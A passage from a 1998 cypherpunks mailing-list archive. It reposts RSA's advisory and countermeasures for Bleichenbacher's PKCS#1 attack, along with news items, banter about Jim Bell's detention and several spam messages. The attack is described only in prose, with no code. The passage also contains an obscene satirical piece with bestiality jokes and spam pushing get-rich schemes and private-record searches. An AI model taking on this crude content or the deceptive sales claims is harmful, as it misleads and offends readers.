Subject: RSA Material on PKCS#1 Crack
Message-ID: <3.0.5.32.19980626194913.00909b10@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The attack: ftp://ftp.rsa.com/pub/pdfs/bulletn7.pdf
	4-page PDF file.  There's also a Postscript version available.
	The paper is by Bleichenbacher of Lucent and
	Burt Kaliski and Jessica Staddon of RSA Labs.
OEM Countermeasures: http://www.rsa.com/rsalabs/pkcs1/oem_counter.html
	(below)
Countermeasures for Users of Servers: http://www.rsa.com/rsalabs/pkcs1/countermeasures.html
	(below - it's pointers to vendor home pages, pleasantly including C2.
	Apparently they've done a good job coordinating it...)
Q&A : http://www.rsa.com/rsalabs/pkcs1/qa.html


======         RSA to Provide OEM Customers
               with Guidelines and Technology to
               Thwart Potential Web Server
               Security Attack

               OAEP Formatting Adds Important Security to
               Vulnerable Applications

               June 26, 1998 -- RSA Data Security, Inc. today
               announced guidelines to assist its OEM customers in
               both assessing their products' vulnerability to a newly
               discovered potential security attack, and to identify
               pre-emptive countermeasures to thwart such an attack. 
               The guidelines are designed to help developers
               understand the nature and mechanism of the threat,
               pose a series of technical questions to identify
               vulnerable constructs in the developer's software
               design, and provide a set of countermeasures from
               which to choose based on the developer's needs. 
               These guidelines are available online at
               http://www.rsa.com/rsalabs/.

               The potential threat affects server products that employ
               an interactive key establishment protocol in conjunction
               with the PKCS #1 standard for digital envelopes,
               including SSL-based servers.  SET (Secure Electronic
               Transaction) and other secure messaging protocols,
               such as S/MIME (Secure Multipurpose Internet Mail
               Extension), are not susceptible to or already implement
               mechanisms preventing this potential attack. 

               Recent research by cryptographer Daniel
               Bleichenbacher of the Bell Labs Secure Systems
               Research Department, the research and development
               arm of Lucent Technologies, indicate that the above
               combination is potentially vulnerable to a class of attack
               known as Adaptive Chosen Ciphertext Attacks.  The
               potential attack noted by Mr. Bleichenbacher relies on
               sending a target server on the order of a million carefully
               constructed messages and observing variations in the
               server's response.  As such, the attack is both
               detectable and can be prevented with countermeasures.

               For some developers, the most effective countermeasure
               is incorporation of the Optimal Asymmetric Encryption
               Padding (OAEP) technology, a method of formatting an
               encrypted message so that attackers cannot learn
               information about the contents through repeated
               probing.  OAEP is designed to thwart a variety of
               attacks, including the Adaptive Chosen Ciphertext
               Attack.

               For other developers, the most effective countermeasure
               will be preventing an assailant from gaining information
               from messages returned from their server.  RSA's
               guidelines provide design information for developers to
               use in implementing this form of countermeasure as well.

               RSA Laboratories, the research arm of RSA, plans to
               include OAEP in the next version of  PKCS #1, a widely
               used cryptography standard, that will be available as a
               draft for comment in July.  PKCS #1 is used in SSL and
               other popular security mechanisms to provide
               confidentiality for exchange of symmetric encryption
               keys (digital envelopes), as well as to construct digital
               signatures.  

               OAEP has already been integrated into RSA's newest
               release of BSAFE(tm) 4.0, the company's flagship
               cryptographic security development suite which began
               shipping this month.  RSA intends to make available
               OAEP updates conforming to the new PKCS #1
               specification for its BSAFE 3.0 and 4.0 products in July,
               and to incorporate OAEP in an upcoming version of
               JSAFE(tm), RSA's security engine for Java(tm).  RSA
               recommends that developers target these upcoming
               OAEP updates for inclusion in their products.  Check
               this site for more information on OAEP updates in the
               coming weeks.  

               RSA's Website will also host links to vendors' sites
               where countermeasures are made available as a service
               to both OEMs and end customers.  See RSA's related
               announcement on this subject.  Currently, the following
               vendor information Website links are available: 

                    C2Net Software, Inc. http://www.c2.net 
                    Consensus Development Corporation
                    http://www.consensus.com/ssl-rsa.html 
                    IBM Corporation http://www.ibm.com/security 
                    Lotus Development Corporation
                    http://www.lotus.com/security 
                    Microsoft Corporation
                    http://www.microsoft.com/security 
                    Netscape Communications Corporation
                    http://www.netscape.com 
                    Open Market, Inc.
                    http://www.openmarket.com/security/ 
                    RSA Data Security, Inc.
                    http://www.rsa.com/rsalabs 

                

               An RSA Labs technical paper discussing this
               vulnerability, as well as additional information, is
               available on RSA's Website,
               http://www.rsa.com/rsalabs.


============ SSL Countermeasures

These countermeasures enhance the security of popular Internet servers 
and  software products based on the Secure Sockets Layer (SSL) protocol.  
The countermeasures are available from respective vendors' Web sites, 
and include configuration guidelines, software updates where applicable 
and additional information.  
Currently available vendor information may be found at the following sites:
                Aventail Corporation
                                            http://www.aventail.com/  
                C2Net Software, Inc. 
                                            http://www.c2.net/
                Consensus Development Corporation
                                            http://www.consensus.com/
                Lotus Development Corporation
                                            http://www.lotus.com/security
                IBM Corporation
                                            http://www.ibm.com/security/
                Microsoft Corporation
                                            http://www.microsoft.com/security/
                Netscape Communications Corporation
                                            http://help.netscape.com/products/server/ssldisc overy/index.html
                Open Market, Inc. 
                                            http://www.openmarket.com/security/
                RSA Data Security, Inc.
                                            http://www.rsa.com/rsalabs/


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 26 Jun 1998 19:24:30 -0700 (PDT)
To: sjmz@hplb.hpl.hp.com
Subject: Wooden sculpture
Message-ID: <35945717.2653@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Friday 6/26/98 7:44 PM

John Young

I am reading

  http://www.jya.com/gak-fails.htm

Tonight I retrieved a wooden sculpture given to me by
numerical analyst 

  LINPACK  http://av.yahoo.com/bin/query?p=linpack&z=2&hc=0&hs=0

Richard Hanson.

That's him!  http://www.vni.com/products/imsl/hanson.html

Hanson gave me the sculpture in about 1978.

Hanson and I have been colleagues for about 25 years.

I will forward it to you.  With initials on the bottom.

And, of course, YOU must pass on the sculpture to the 
NEXT DESERVING.

Our buddies aren't happy about what happened.  http://www.wpiran.org/

Allahu akbar ... and keep up wind. 

Until we get SETTLMENT, of course.

Settlment must include support payments for Iranian mothers who lost
sons in the Iraq/Iran war, retirement benfits for them, health insurance
and a LETTER OF APOLOGY.  All paid for by NSA and the CIA.

We are ALL working for settlment.

bill

http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2

http://www-hto.usc.edu/software/seqaln/doc/html/gfsr.3.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lee7@msn.com
Date: Fri, 26 Jun 1998 20:57:18 -0700 (PDT)
To: lee7@msn.com
Subject: WORRIED ABOUT HIS OR HER BACKGROUND?
Message-ID: <199806261236HAA45284@RECON.lonet.ca>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><BODY BGCOLOR="#ff0080"></P><P ALIGN=CENTER><FONT  BACK="#ffff80" SIZE=4 PTSIZE=12 FAMILY="SERIF" FACE="Times New Roman"><B>INFORMATION USA</FONT><FONT  SIZE=3 PTSIZE=12>             
    
Your Source For Information    
    
<U>LOCATE</U>     
                 
 </FONT><FONT  COLOR="#004080" SIZE=3 PTSIZE=12>   </FONT><FONT  COLOR="#400040" SIZE=3 PTSIZE=12> Business & Individuals in the USA    
Old Friends, Lost Loved Ones, Dead Beat Parents, Debtors</FONT><FONT  BACK="#ff00ff" SIZE=3 PTSIZE=12>    
</FONT><FONT  BACK="#ffff80" SIZE=3 PTSIZE=12>    
<U>Assets    
    
</U>Local, State, National & International    
    
</P><P ALIGN=LEFT>Information needed varies, sometimes just a name.  Helpful information would be Last Known     Address, Social Security Number, Date of Birth and any other information you feel would be of use.  Provide us with everything you have and let the Professionals at <I>Information USA</I> do the rest.    
    
<I>Information USA</I> has the most competitive prices in the industry!  Call today for a free price quote.    
    
</P><P ALIGN=CENTER>    
    
<U>Other Services Available    
    
</U>*Criminal Background *Civil Court Records *Bankruptcy & Liens & Judgments     
*National Real Property *Business Credit Reports *Corporate Profiles    
 *National Bank Asset Information *Stocks & Bonds & Mutual Fund Search    
 *Safe Deposit Box Search *Social Security Death Records *Marriage & Divorce     
*Workers Compensation Records *Non-Published Numbers *Drivers License Records *Vehicle Records Search *Water & Aircraft Search *Pre-Trial Comprehensive Reports     
*Pre-Employment Background *Verify Education *Verify Professional License     
*Verify Employment    
    
<U>Call for additional Services    
    
</FONT><FONT  SIZE=5 PTSIZE=14>Information USA    
    
Call Toll Free    
    
1-888-370-9112    
    
Ask for Ken Wagner    
    
</FONT><FONT  SIZE=4 PTSIZE=12><I>Visa, MasterCard & Discover Cards Accepted</FONT><FONT  SIZE=3 PTSIZE=12></I>    
    
</U>    
</P><P ALIGN=LEFT>    
    
    
<U>    
</P><P ALIGN=CENTER></U>    
</FONT></FONT><FONT  COLOR="#000000" BACK="#FFFFFF" SIZE=3 PTSIZE=12>        
</B></P></HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Fri, 26 Jun 1998 21:55:15 -0700 (PDT)
To: cypherpunks@toad.com
Subject: BumBoy III - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <009C84D5.C921D340.16@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


BumBoy III - SPACE ALIENS HIDE M DRUGS!!!
__________________________________________

BumBoy Interview: C-J VAN DAMNNED (will it never end?)
{ AnInterViewerToBeNamedLater, sucking medication out of
  Baby's twat, only to find that it was a surprisingly
  pleasureable experience, made the mistake of allowing
  the Author to continue the interview on his own, while
  she and the TruthMongrel engaged in behavior that even
  the disgusting perverts on the BumBoy staff found to
  be revolting, since it was being done by two females.}

VOICES: "Tell them about US..."
VAN DAMNNED: It's not always voices...sometimes it's dreams...
sometimes the TV, or the Radio, or...anything, really...
Like the dream where I'm in the front row at a prizefight,
and two guys are beating the living shit out of each other,
until the final bell sounds and the winner is declared.
Then the two guys get out of the ring and come after me. The
one wearing the elephant-colored boxing trunks holds me down
while the one wearing the donkey-colored trunks starts shoving
a large box up my asshole, and pieces of paper fall out, giving
me papercuts, until one of the pieces of paper cuts my throat
as I puke it out, and the two guys who pretended to be fighting
each other are sucking up my blood out of the trough at the 
edge of the boxing ring, which turns out to be a pig-pen.
As the last of my lifeblood drains out of me, a person in
a dirty white smock appears, saying, "I'm from the government,
and I'm here to help you." As the person places the piece of
paper that cut my throat onto my juglar vein, to stop the 
bleeding, I notice that it is an election ballot--it is *my* 
election ballot.
As the ambulance rushes me back to my office, to return to
work, with the attendants telling me I should be back to normal
in about forty months, the two boxers walk past me, arm in
arm, with two sinister-looking agents walking behind them,
discussing their 'fighters' rematch, four years hence.
They have decided to raise the price of tickets from $100.00
to $500.00, since the government automatically deducts it
from everyone's paycheck, whether they attend the 'fight'
or not. As they discuss how much to raise the concession
prices for beer, soda, peanuts, popcorn and hot dogs, they
seem to suddenly notice me, and stop to offer their sincere
condolences for my 'accident', and say that they hope it
won't prevent me from attending the rematch.
As if on cue, the fight-promoter, who tells me he is from
the government, and is here to help me, picks up a pig-turd
containing a small piece of the hot-dog I was eating when I
was sodomized by the boxers, and hands it to me, saying, "This
is your share of the 'take'. ou know, in Communist countries,
the government keeps it all..."
I don't think I'll attend the rematch. I have a feeling that
I already know who wins...and who loses...

VOICES: "ou're getting excited again. Why don't you take your
medicine, and read a book, or something, to calm you down?"
VAN DAMNNED: ou sadistic pricks, you *know* that the only 
book I have with me is Collier and Horowitz's, 'The KENNEDS,
AN AMERICAN DRAMA,' and it's not in the least bit entertaining,
since I just finished a book about the Mafia, so I know how
everything in the Kennedy book, or *any book on politics, is 
going to turn out even before the authors even finish writing 
about it.
It's even more depressing than reading Hitler's "Mein Kamf" and
"New World Order" and then reading mainstream press reports about
government news conferences. Doesn't anybody do 'original material'
any more, or is everyone just plagarizing President Henny oungman,
who said, "Take my citizens...please!"
And take them...and take them...and take them...

VOICES: "We *told* you that everything since the Big Bang has
been plagarism..."
VAN DAMNNED: Oh, yeah? What about my song, "Booger-Eating Dog
(Don't Bite The Nose That Feeds ou)," or, "I Was Sitting On
My Horse, And She Jerked Me Off," and all of the other sick,
depraved songs I've written? Do you see a big lineup of people
claiming credit for the lyrics?

VOICES: "ou're getting excited again. See, you even placed your
quote marks in the correct place..."
VAN DAMNNED: See, there is another thing that proves that people
are capable of original, independent thought and actions...
Just because I'm the Author doesn't mean I have to use correct
spelling, punctuation, syntax (whatever the hell that is), or
write in a manner that indicates a well-researched and well-
reasoned train of thought. 

VOICES: "That doesn't make you unique, you fucking imbecile.
Just ask any one of a thousand publishing editors who have
to wade through the mountains of trash sent to them by self-
declared 'authors' who eventually end up cashing in Andy
Warhol's IOU for 'Fifteen Minutes Of Fame' by becoming a
guest on the Jerry Springer Show and telling the whole world
about how they got their dog pregnant by sucking themselves
off and blowing their sperm up her twat."
VAN DAMNNED: That wasn't *me*! That was someone who just
looked like me and deposited Jerry Springer's check in my
bank account to make me look bad.
But I don't mind, because it makes me unique!

VOICES: "Everything since the BigBang is Plagarism. ou're just
like all the other Sheeple."
VAN DAMNNED: No! ou're trying to trick me into thinking that
I'm not a free, independent human being. ou're trying to take
away the only things I have to hold on to that make me unique. 
ou want me to believe that I am not the only sick, depraved
pervert in the world who spreads FUD (Fear, Uncertainty and 
Disinformation) in an attempt to cloak my evil, wretched life
in an aura of grandoise importance and imagined righteousness.

VOICES: "ou haven't been following the Clinton-Lewinski affair
in the news, have you?"
VAN DAMNNED: Shut up! I'm not listening! I AM *NOT* LIKE 
PRESIDENT CLINTON!!!
I did *not* give strong encryption to those Chinese people who
let me have my way with Buddy in the Lincoln bedroom before they
ate him. I'm the one who tried to expose the fact that the *real*
Buddy had been replaced by a cross-cloning of Spuds Mackenzie and
Janet Reno. I told the CypherPunks to draw glasses on a picture
of Buddy and see if it looked like Reno.
That was *me*, *really*! I just forged Mark Hedges name to that
post to make him look like an asshole! Honest!

VOICES: "ou're just like all of the other sorry, pathetic losers
who can't get a *real* publishing contract with a *real* publisher
who is helping to destroy the Rain Forests by printing millions of
hardcover and paperback books decrying the destruction and loss 
of the Rain Forests.
"Instead, you continue to contribute to the destruction of the
Digital Environment by sending mountains of your rotting, greasy
Digital SPAM to the CypherPunks Disturbed Male List, where your
sins are compounded in MeatSpace as a result of the millions of
plastic <Delete> keys that need to be created every day in order
for decent, moral, law-abiding NetiZens to protect themselves and
their children from your mindless drivel.
"As punishment, WE are going to tell you the *real* name of the
right-hand square bracket..."
VAN DAMNNED: Noooo!!! I'M NOT LISTENING!!!
AAARRRRRGGHHHHH!!!!!!!!!!!!!!!!!!!!!!!!!!!

{The BumBoy Interview with C-J VAN DAMNNED came to a sudden end,
 as heavily armed, black-clad ninja agents of ACypherNipsNode-
 ToBeNamedLater, came bursting through the door, screaming,
 "Torah! Torah! Torah! Chop! Chop! <Hee-Hee>", surrounding the
 Author and allowing AnInterviewerToBeNamedLater to grab Baby
 and the tape recorder, making her escape while clutching her skirt
 close to her body, as the Author was trying to peek up it even
 as he lie on the floor taking a tremendous beating.
 "ou've got to admire his persistence." she told BumBoy editors
 while dropping off the interview tapes.
 Sadly, we must report that Baby, obviously a codependent enabler
 of the Author's sickness, failed to make it to California, where
 BumBoy was prepared to foot the bill for her to see a Doggie
 Therapist, instead choosing to return to the Author, once again
 dropping the BadBillyG mask at HisOrHer feet and backing toward
 him with her tail raised in eager anticipation.
 Redoubtable sources inform us that the black-clad ninja agents
 of ACypherNipsNodeToBeNamedLater sat back, drinking the Author's
 Scotch and enjoying the spectacle, as well as tucking money in
 the Author's panties when HeOrShe bound Baby's feet for the
 second performance.
 Official Police Reports indicate that, when officers arrived in
 response to noise complaints from the neighbors, that the ninjas
 were fighting violently over a Din-Din Tin roasting pan and a
 bottle of barbeque sauce, seemingly surprised that the Author 
 and Baby TruthMongrel had vanished.
 The leader of the black-clad ninja agents was quoted as saying,
 "Shit! We come to Ito his dog, and now we have to go home and
 Ito mole of his SPAM, instead." Turning to his companions, he
 said, "We go now...chop-chop!"
 Looking embarassed, the leader explained to police, "We not 
 even know what that mean, until oul fliend, Timmy-San, point
 us to the alchives, whele we find out it mean we have big
 cocks, rike Amelican bikels. Then we aporogized fol accusing
 Timmy-San of making fun of us. He good guy..."
 The editors at BumBoy, upon receiving Declan McCullagh's 
 expense receipts for the clothing he purchased to go undercover
 as AnInterviewerToBeNamedLater, could not help but notice that
 an article of clothing conspicuously missing from the receipts
 was...panties.}





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 27 Jun 1998 13:05:28 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Jim Bell Update
Message-ID: <199806272005.QAA08989@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


According to the June 26 court docket:

1. Jim was arrested June 22;

2. A hearing was held on June 23, USDC Western WA, 
Tacoma;

3. A new defense attorney present, Peter Voelker;

4. Jim advised of rights and of allegations in violation petition 
(not specified); 

5. Gov moves for detention; 

6. Gov and defense attorneys make unspecified proffers; 

7. Jim is ordered detained; 

8. Probation revocation hearing set for July 10;

9. Judge appoints an (unamed) Federal Public Defender.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 27 Jun 1998 15:34:16 -0700 (PDT)
To: cypherpunks@toad.com
Subject: CIA Hires Lo/Hi-Tech Spies
Message-ID: <199806272234.SAA30802@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


NYT, June 27, 1998:

Getting Back to Basics, C.I.A. Is Hiring More Spies 

Taking steps to reduce dependence on high-tech spying. 

By James Risen

Washington, June 26--The Central Intelligence Agency 
is beginning the largest recruitment drive for new spies 
in its history, in an ambitious effort to rebuild its 
espionage service, which has been severely damaged by 
spy scandals, budget cutbacks and high turnover since 
the end of the cold war, officials said.
 
With Congress already providing increased financing, 
the Directorate of Operations, the C.I.A.'s clandestine 
espionage arm, will hire record numbers of case officers
--spies-- beginning this year as part of a new strategic 
plan to repair the decaying espionage capabilities of 
the United States by 2005, officials said. 

In addition to expanded hiring, the agency also plans to 
reopen several overseas stations that were closed in the 
early 1990's after the demise of the Soviet Union led 
Congress and the White House to reduce the C.I.A.'s 
budget sharply. 

The recruitment plan is a sign that the C.I.A. recognizes 
that it has become far too dependent on so-called technical 
intelligence, or eavesdropping devices and spy satellites. 
Now, the agency wants to get back to espionage basics, by 
increasing its ability to place a spy behind enemy lines 
or inside the offices of a rival government. 

The spread of new technologies like encryption and computer 
networks has eroded the value of spy satellites and listening 
devices and has led the C.I.A. to see the need for an 
expanded cadre of spies. Without having an agent in place, 
the C.I.A. has found it much harder to gain access to secrets 
from rival governments, terrorists and international 
organized crime groups.  ...

The C.I.A. is recruiting case officers, and people to support 
them with technical skills that spies have rarely been asked 
to learn in the past. 

"As we tried to figure out our requirements for the future, 
we realized we needed to have greater technical support for 
agent operations," said one American official. 

At the top of the list of requirements is computer expertise. 
The proliferation of global computer data networks, for example, 
has made it more difficult for the agency to slip into a 
country using false identifications. Only computer experts 
can defeat those local computer systems, and even developing 
countries routinely make sophisticated computer checks on 
passports and visas. ...

-----

Full story: http://jya.com/cia-hires.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jorge C. Palma"<jorgec@mundivia.es>
Date: Sat, 27 Jun 1998 13:16:23 -0700 (PDT)
To: jyu-ohjelmointi-cypherpunks@uunet.uu.net
Subject: What does it mean and How much does it cost a healthy diet? A natural foods one !
Message-ID: <6n3jrl$27h$14645@talia.mad.ibernet.es>
MIME-Version: 1.0
Content-Type: text/plain


Cantabrian Altamira Shopping
http:/www.cantabrian.com/altamira/altamira.htm

Hello:

How much does it cost a healthy diet?. Cantabrian Altamira Shopping shows in its web pages natural
and ecological foods without additives and preservants from Spain.  
You will find there white tuna, anchovies, honeys, partridges, wines and assocites.

We apologize if this message has been missadressed,

Thanks, Cantabrian Virtual Publishers                                                         http://www.cantabrian.com  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 27 Jun 1998 18:43:00 -0700 (PDT)
To: cypherpunks@toad.com
Subject: AU Cryptozilla Attack
Message-ID: <199806280142.VAA19935@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to Anonymous we offer the article which
describes the AU government attack on Eric Young's 
and Tim Hudson's full-strength Cryptozilla for Netscape:

   http://jya.com/oz-crypto.htm

It's also a good overview of crypto policy battles down 
under -- the pols, the crats, the laws, the regs, the 
obfuscations, the work arounds of export controls
and runarounds with chicken heads off -- like like 
all around hereabouts.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sat, 27 Jun 1998 20:06:47 -0700 (PDT)
To: John Young <jya@pipeline.com>
Subject: Re: CIA Hires Lo/Hi-Tech Spies
In-Reply-To: <199806272234.SAA30802@camel7.mindspring.com>
Message-ID: <199806280312.WAA005.26@geiger.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <199806272234.SAA30802@camel7.mindspring.com>, on 06/27/98 
   at 06:29 PM, John Young <jya@pipeline.com> said:

>Washington, June 26--The Central Intelligence Agency 
>is beginning the largest recruitment drive for new spies 
>in its history, in an ambitious effort to rebuild its 
>espionage service, which has been severely damaged by 
>spy scandals, budget cutbacks and high turnover since 
>the end of the cold war, officials said.

Sounds like a good time to get some moles in place. :)

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://users.invweb.net/~whgiii/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: Windows: Just another pane in the glass.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNZW0j49Co1n+aLhhAQFhOAQAn8B/VxAiIofDpynV9GMrL4QCnWIsbng6
dEG51nVIe9L+UWyyuYc9NFB4NjIxhXp4dibJG1H9PlkXg++vvMYR6JUyHa6h1/E2
dMY7injK0KZvYUd9Rvhq/JM1p56cRwnXa0UVtlP2b4cJsB+1v6ZxWlyvtCoEkz/n
q5nUM8lzlgI=
=vQay
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jan <jdobruck@kki.net.pl>
Date: Sat, 27 Jun 1998 13:31:21 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Program: 'Speak Feely' for "secure comminucations"...
Message-ID: <3595576A.A100CB77@kki.net.pl>
MIME-Version: 1.0
Content-Type: text/plain


Greetings,

I've come across this program on the net which claims to give "secure
communications"... could any of you folks comment of this program? 

	Speak Freely 6.1 For Windows 95/NT (295K) 
	Author: John Walker 
	Homepage: http://www.fourmilab.ch/speakfree/windows/
	Description: Real time one to one audio chat, half or full duplex,
bitmap 	transfer. Encryption for secure communications. Might be slow
with modem 	connections. 

The text below is part of the text on the homepage...

========================
Speak Freely for Windows

                         Release 6.1

Speak Freely is a Windows application that allows you to talk
(actually send voice, not typed characters) over a network. If your
network connection isn't fast enough to support real-time voice data,
four forms of compression may allow you, assuming your computer is
fast enough, to converse nonetheless. To enable secure communications,
encryption with DES, IDEA, and/or a key file is available. If PGP is
installed on the user's machine, it can be invoked automatically to
exchange IDEA session keys for a given conversation. Speak Freely for
Windows is compatible with Speak Freely for Unix, and users of the two
programs can intercommunicate. Users can find one another by
communicating with a "Look Who's Listening" phone book server. You can
designate a bitmap file to be sent to users who connect so they can
see who they're talking to. Speak Freely supports Internet RTP
protocol, allowing it to communicate with other Internet voice
programs which use that protocol; in addition, Speak Freely can also
communicate with programs which support the VAT (Visual Audio Tool)
protocol.

...

[remainder snipped]

Jan out.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sat, 27 Jun 1998 21:05:16 -0700 (PDT)
To: John Young <jya@pipeline.com>
Subject: Re: Jim Bell Update
In-Reply-To: <199806272005.QAA08989@camel8.mindspring.com>
Message-ID: <199806280410.XAA006.76@geiger.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <199806272005.QAA08989@camel8.mindspring.com>, on 06/27/98 
   at 04:01 PM, John Young <jya@pipeline.com> said:

>According to the June 26 court docket:

>1. Jim was arrested June 22;

>2. A hearing was held on June 23, USDC Western WA, 
>Tacoma;

>3. A new defense attorney present, Peter Voelker;

>4. Jim advised of rights and of allegations in violation petition  (not
>specified); 

>5. Gov moves for detention; 

>6. Gov and defense attorneys make unspecified proffers; 

>7. Jim is ordered detained; 

>8. Probation revocation hearing set for July 10;

>9. Judge appoints an (unamed) Federal Public Defender.


If I were Jim the next time I got out they would never find me again. It
seems quite obvious that they are going to hound him to the day he dies.

Jim has a chem degree doesn't he? I know a few countries where such
talents are in demand :)

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://users.invweb.net/~whgiii/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: One man's Windows are another man's walls.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNZXCSI9Co1n+aLhhAQGG1AP/c8CDhDVDneygrcvglEofoiq48YvWvE4u
cgAc/ox7yOkAsInxmqeiFZGUgiyIYeIJXLvFY43D+T4v2xU4t50L6tFf22nVjxmP
kUqv5QPn0xB7ssO7LMUWKOqoP7doqNks275LB92LFANX44bp1RRhTr7ziiw22L6A
dD/FhnB1x1Q=
=cI+Z
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: workathome@grid.sk
Date: Sat, 27 Jun 1998 14:30:37 -0700 (PDT)
To: <cypherpunks-unedited@toad.com>
Subject: Use Your Computer To Make Money From Home
Message-ID: <199806272143.XAA10412@durman.krnap.cz>
MIME-Version: 1.0
Content-Type: text/plain



Use Your Computer To Make Money From Home

Great Home-Based Business Opportunity.
Secret Marketing Software Turns YOUR 
PC Into A MONEY MACHINE!

Easy And Simple.  No Risk!

Free Marketing Software Explains How!

Act Now!  To Turn YOUR Computer Into A Money Machine,
Send Your Name, Address, and Phone Number within 48 hrs. to:

mailto:cashsoftware6@juno.com 


Click here for removal -> mailto:optout3@juno.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ci0u@worldnet.att.net
Date: Sat, 27 Jun 1998 19:32:29 -0700 (PDT)
To: hgbc31kvt15@generalnet.com
Subject: Earn $100 every time OUR phone rings...
Message-ID: <QQevqw24963.199806280232@smtp0-alterdial.uu.net>
MIME-Version: 1.0
Content-Type: text/plain



ALL YOU DO IS ADVERTISE THIS 800 NUMBER! THAT'S ALL!! 

$100 goes to you for EVERY sale that the company closes!

Does the idea of making at least $1,000 per week beginning your 2nd week of 
doing business excite you? 

How about never having to sell a thing to your customer and never having 
to talk to ANYONE to make money? I don't know how this could get any easier.

EVERY aspect of selling or talking to someone is DONE COMPLETELY by the company!  

The number one home based business for the 2nd year in a row, Fortune 5000 
is a member of the Better Business Bureau and the U.S. Chamber of Commerce.

WHAT THIS BUSINESS WILL DO FOR YOU:

* Handles all your calls, closes your sales, and 
  sends you WEEKLY commission checks! 

* It pays you a $100 commission (that's over 50% of the total sale)
  for EVERY sale. CHECKS put $$$ in your pocket in less than your first 
  week or two... Quick commission earnings build and maintain motivation. 
  ALL YOU DO IS ADVERTISE the toll-free number and your ID number. 

* You can get STARTED TODAY. Just advertise the business toll-free 
  number with your ID # and let this business CLOSE YOUR SALES every day...
  They do all the work and YOU GET PAID FOR IT! 

* You may advertise any way you choose: Bulk E-Mail, Flyers, Classifieds, 
  Postcards, etc. Suppose you use bulk E-Mail, as I am: 100,000 E-Mails
  with a 1/10th of a percent (0.1%) sales rate at $100 per sale nets 
  $10,000... not too bad.

There is nothing else out there that will provide you with an immediate income 
beginning THIS WEEK with minimal effort.

Before you call, I want you to think about the quality of the live 
operators handling your call. I am convinced you will not find 
a better team of closers for your own personal sales.  You will 
clearly understand what I am talking about once you call.  

PLEASE DON'T LET THIS PASS YOU BY. MAKE THE CALL!!

1-800-811-2141

You will be asked for ID #50030 when you call.

(Live operators are available from 8 AM-10 PM CST Monday through Saturday and 
will be able to answer any questions you may have.)

Call one of the 24hr TESTIMONIAL lines at 888-703-5389, 888-446-6949, 888-446-6951
or 888-731-3457 (all toll free). 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Sat, 27 Jun 1998 21:34:04 -0700 (PDT)
To: "William H. Geiger III" <whgiii@invweb.net>
Subject: Re: Jim Bell Update
In-Reply-To: <199806280410.XAA006.76@geiger.com>
Message-ID: <Pine.BSF.3.96.980628043107.1461A-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 27 Jun 1998, William H. Geiger III wrote:

>If I were Jim the next time I got out they would never find me again. It
>seems quite obvious that they are going to hound him to the day he dies.
>
>Jim has a chem degree doesn't he? I know a few countries where such
>talents are in demand :)
>
	yeah, but the weather in Baghdad is not only hot, but 
  	occasionally rains clusters.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: creditmedic@earthlink.net
Date: Sun, 28 Jun 1998 06:30:00 -0700 (PDT)
To: Friend@public.com
Subject: Credit Medic
Message-ID: <199806281325.GAA12072@scotland.it.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


Dear Friend,

DO YOU SUFFER FROM BAD CREDIT?  DO YOU WISH YOU 
